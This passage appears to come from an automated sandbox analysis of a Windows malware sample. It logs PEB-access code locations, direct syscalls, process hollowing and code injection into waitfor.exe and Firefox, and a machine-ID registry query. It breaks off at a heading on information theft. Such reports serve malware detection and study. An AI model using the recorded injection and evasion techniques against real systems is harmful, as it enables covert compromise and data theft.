                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DA6C7 mov eax, dword ptr fs:[00000030h]4_2_014DA6C7
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0151E6F2 mov eax, dword ptr fs:[00000030h]4_2_0151E6F2
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0151E6F2 mov eax, dword ptr fs:[00000030h]4_2_0151E6F2
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0151E6F2 mov eax, dword ptr fs:[00000030h]4_2_0151E6F2
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0151E6F2 mov eax, dword ptr fs:[00000030h]4_2_0151E6F2
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015206F1 mov eax, dword ptr fs:[00000030h]4_2_015206F1
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015206F1 mov eax, dword ptr fs:[00000030h]4_2_015206F1
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A4690 mov eax, dword ptr fs:[00000030h]4_2_014A4690
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A4690 mov eax, dword ptr fs:[00000030h]4_2_014A4690
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DC6A6 mov eax, dword ptr fs:[00000030h]4_2_014DC6A6
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D66B0 mov eax, dword ptr fs:[00000030h]4_2_014D66B0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01520946 mov eax, dword ptr fs:[00000030h]4_2_01520946
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01574940 mov eax, dword ptr fs:[00000030h]4_2_01574940
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E096E mov eax, dword ptr fs:[00000030h]4_2_014E096E
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E096E mov edx, dword ptr fs:[00000030h]4_2_014E096E
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E096E mov eax, dword ptr fs:[00000030h]4_2_014E096E
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01544978 mov eax, dword ptr fs:[00000030h]4_2_01544978
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01544978 mov eax, dword ptr fs:[00000030h]4_2_01544978
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C6962 mov eax, dword ptr fs:[00000030h]4_2_014C6962
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C6962 mov eax, dword ptr fs:[00000030h]4_2_014C6962
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C6962 mov eax, dword ptr fs:[00000030h]4_2_014C6962
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152C97C mov eax, dword ptr fs:[00000030h]4_2_0152C97C
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152C912 mov eax, dword ptr fs:[00000030h]4_2_0152C912
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01498918 mov eax, dword ptr fs:[00000030h]4_2_01498918
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01498918 mov eax, dword ptr fs:[00000030h]4_2_01498918
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0151E908 mov eax, dword ptr fs:[00000030h]4_2_0151E908
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0151E908 mov eax, dword ptr fs:[00000030h]4_2_0151E908
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152892A mov eax, dword ptr fs:[00000030h]4_2_0152892A
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0153892B mov eax, dword ptr fs:[00000030h]4_2_0153892B
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0156A9D3 mov eax, dword ptr fs:[00000030h]4_2_0156A9D3
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015369C0 mov eax, dword ptr fs:[00000030h]4_2_015369C0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014AA9D0 mov eax, dword ptr fs:[00000030h]4_2_014AA9D0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014AA9D0 mov eax, dword ptr fs:[00000030h]4_2_014AA9D0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014AA9D0 mov eax, dword ptr fs:[00000030h]4_2_014AA9D0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014AA9D0 mov eax, dword ptr fs:[00000030h]4_2_014AA9D0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014AA9D0 mov eax, dword ptr fs:[00000030h]4_2_014AA9D0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014AA9D0 mov eax, dword ptr fs:[00000030h]4_2_014AA9D0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D49D0 mov eax, dword ptr fs:[00000030h]4_2_014D49D0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152E9E0 mov eax, dword ptr fs:[00000030h]4_2_0152E9E0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D29F9 mov eax, dword ptr fs:[00000030h]4_2_014D29F9
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D29F9 mov eax, dword ptr fs:[00000030h]4_2_014D29F9
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015289B3 mov esi, dword ptr fs:[00000030h]4_2_015289B3
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015289B3 mov eax, dword ptr fs:[00000030h]4_2_015289B3
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015289B3 mov eax, dword ptr fs:[00000030h]4_2_015289B3
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A09AD mov eax, dword ptr fs:[00000030h]4_2_014A09AD
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A09AD mov eax, dword ptr fs:[00000030h]4_2_014A09AD
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B29A0 mov eax, dword ptr fs:[00000030h]4_2_014B29A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B29A0 mov eax, dword ptr fs:[00000030h]4_2_014B29A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B29A0 mov eax, dword ptr fs:[00000030h]4_2_014B29A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B29A0 mov eax, dword ptr fs:[00000030h]4_2_014B29A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B29A0 mov eax, dword ptr fs:[00000030h]4_2_014B29A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B29A0 mov eax, dword ptr fs:[00000030h]4_2_014B29A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B29A0 mov eax, dword ptr fs:[00000030h]4_2_014B29A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B29A0 mov eax, dword ptr fs:[00000030h]4_2_014B29A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B29A0 mov eax, dword ptr fs:[00000030h]4_2_014B29A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B29A0 mov eax, dword ptr fs:[00000030h]4_2_014B29A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B29A0 mov eax, dword ptr fs:[00000030h]4_2_014B29A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B29A0 mov eax, dword ptr fs:[00000030h]4_2_014B29A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B29A0 mov eax, dword ptr fs:[00000030h]4_2_014B29A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B2840 mov ecx, dword ptr fs:[00000030h]4_2_014B2840
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A4859 mov eax, dword ptr fs:[00000030h]4_2_014A4859
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A4859 mov eax, dword ptr fs:[00000030h]4_2_014A4859
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D0854 mov eax, dword ptr fs:[00000030h]4_2_014D0854
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152E872 mov eax, dword ptr fs:[00000030h]4_2_0152E872
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152E872 mov eax, dword ptr fs:[00000030h]4_2_0152E872
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01536870 mov eax, dword ptr fs:[00000030h]4_2_01536870
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01536870 mov eax, dword ptr fs:[00000030h]4_2_01536870
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152C810 mov eax, dword ptr fs:[00000030h]4_2_0152C810
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0154483A mov eax, dword ptr fs:[00000030h]4_2_0154483A
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0154483A mov eax, dword ptr fs:[00000030h]4_2_0154483A
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C2835 mov eax, dword ptr fs:[00000030h]4_2_014C2835
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C2835 mov eax, dword ptr fs:[00000030h]4_2_014C2835
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C2835 mov eax, dword ptr fs:[00000030h]4_2_014C2835
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C2835 mov ecx, dword ptr fs:[00000030h]4_2_014C2835
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C2835 mov eax, dword ptr fs:[00000030h]4_2_014C2835
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C2835 mov eax, dword ptr fs:[00000030h]4_2_014C2835
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DA830 mov eax, dword ptr fs:[00000030h]4_2_014DA830
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CE8C0 mov eax, dword ptr fs:[00000030h]4_2_014CE8C0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015708C0 mov eax, dword ptr fs:[00000030h]4_2_015708C0
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0156A8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014DC8F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014A0887 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0152C89D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_01572B57 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0154EB50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_01536B40 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_01548B42 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0156AB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_01498B50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_01554B4B mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0149CB7E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0151EB1D mov eax, dword ptr fs:[00000030h] (9 occurrences)
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_01574B00 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014CEB20 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_01568B28 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0154EBD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014C0BCB mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014A0BCD mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0152CBF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014CEBFC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014A8BF0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_01554BB0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014B0BBE mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014B0A5B mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014A6A50 mov eax, dword ptr fs:[00000030h] (7 occurrences)
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014DCA6F mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0151CA72 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0154EA60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0152CA11 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014CEA2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014DCA24 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014DCA38 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014C4A35 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014F6ACC mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014A0AD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014D4AD0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014DAAEE mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014AEA80 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe | NtOpenKeyEx: Direct from: 0x77672B9C
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe | NtProtectVirtualMemory: Direct from: 0x77672F9C
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe | NtCreateFile: Direct from: 0x77672FEC
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe | NtOpenFile: Direct from: 0x77672DCC
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe | NtTerminateThread: Direct from: 0x77672FCC
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe | NtQueryInformationToken: Direct from: 0x77672CAC
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe | NtAllocateVirtualMemory: Direct from: 0x77672BEC
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe | NtDeviceIoControlFile: Direct from: 0x77672AEC
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe | NtQuerySystemInformation: Direct from: 0x776748CC
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe | NtQueryAttributesFile: Direct from: 0x77672E6C
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe | NtSetInformationThread: Direct from: 0x77672B4C
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe | NtOpenSection: Direct from: 0x77672E0C
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe | NtQueryVolumeInformationFile: Direct from: 0x77672F2C
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe | NtAllocateVirtualMemory: Direct from: 0x776748EC
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe | NtSetInformationThread: Direct from: 0x776663F9
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe | NtReadVirtualMemory: Direct from: 0x77672E8C
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe | NtCreateKey: Direct from: 0x77672C6C
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe | NtClose: Direct from: 0x77672B6C
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe | NtWriteVirtualMemory: Direct from: 0x7767490C
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe | NtAllocateVirtualMemory: Direct from: 0x77673C9C
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe | NtDelayExecution: Direct from: 0x77672DDC
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe | NtCreateUserProcess: Direct from: 0x7767371C
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe | NtQuerySystemInformation: Direct from: 0x77672DFC
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe | NtQueryInformationProcess: Direct from: 0x77672C26
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe | NtResumeThread: Direct from: 0x77672FBC
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe | NtReadFile: Direct from: 0x77672ADC
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe | NtAllocateVirtualMemory: Direct from: 0x77672BFC
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe | NtResumeThread: Direct from: 0x776736AC
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe | NtSetInformationProcess: Direct from: 0x77672C5C
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe | NtMapViewOfSection: Direct from: 0x77672D1C
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe | NtNotifyChangeKey: Direct from: 0x77673C2C
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe | NtWriteVirtualMemory: Direct from: 0x77672E3C
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe | NtCreateMutant: Direct from: 0x776735CC
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Memory written: C:\Users\user\Desktop\suBpo1g13Q.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Section loaded: NULL target: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe protection: execute and read and write
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Section loaded: NULL target: C:\Windows\SysWOW64\waitfor.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: NULL target: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe protection: read write
Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: NULL target: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\waitfor.exe | Thread register set: target process: 7532
Source: C:\Windows\SysWOW64\waitfor.exe | Thread APC queued: target process: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Process created: C:\Users\user\Desktop\suBpo1g13Q.exe "C:\Users\user\Desktop\suBpo1g13Q.exe"
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Process created: C:\Users\user\Desktop\suBpo1g13Q.exe "C:\Users\user\Desktop\suBpo1g13Q.exe"
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe | Process created: C:\Windows\SysWOW64\waitfor.exe "C:\Windows\SysWOW64\waitfor.exe"
Source: C:\Windows\SysWOW64\waitfor.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: iBkWOgpZKSoi.exe, 00000006.00000000.1554508698.0000000000BA1000.00000002.00000001.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000006.00000002.3811475656.0000000000BA0000.00000002.00000001.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000000.1710069200.0000000000F61000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: iBkWOgpZKSoi.exe, 00000006.00000000.1554508698.0000000000BA1000.00000002.00000001.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000006.00000002.3811475656.0000000000BA0000.00000002.00000001.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000000.1710069200.0000000000F61000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: iBkWOgpZKSoi.exe, 00000006.00000000.1554508698.0000000000BA1000.00000002.00000001.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000006.00000002.3811475656.0000000000BA0000.00000002.00000001.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000000.1710069200.0000000000F61000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: EProgram Manager
Source: iBkWOgpZKSoi.exe, 00000006.00000000.1554508698.0000000000BA1000.00000002.00000001.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000006.00000002.3811475656.0000000000BA0000.00000002.00000001.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000000.1710069200.0000000000F61000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Queries volume information: C:\Users\user\Desktop\suBpo1g13Q.exe VolumeInformation
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

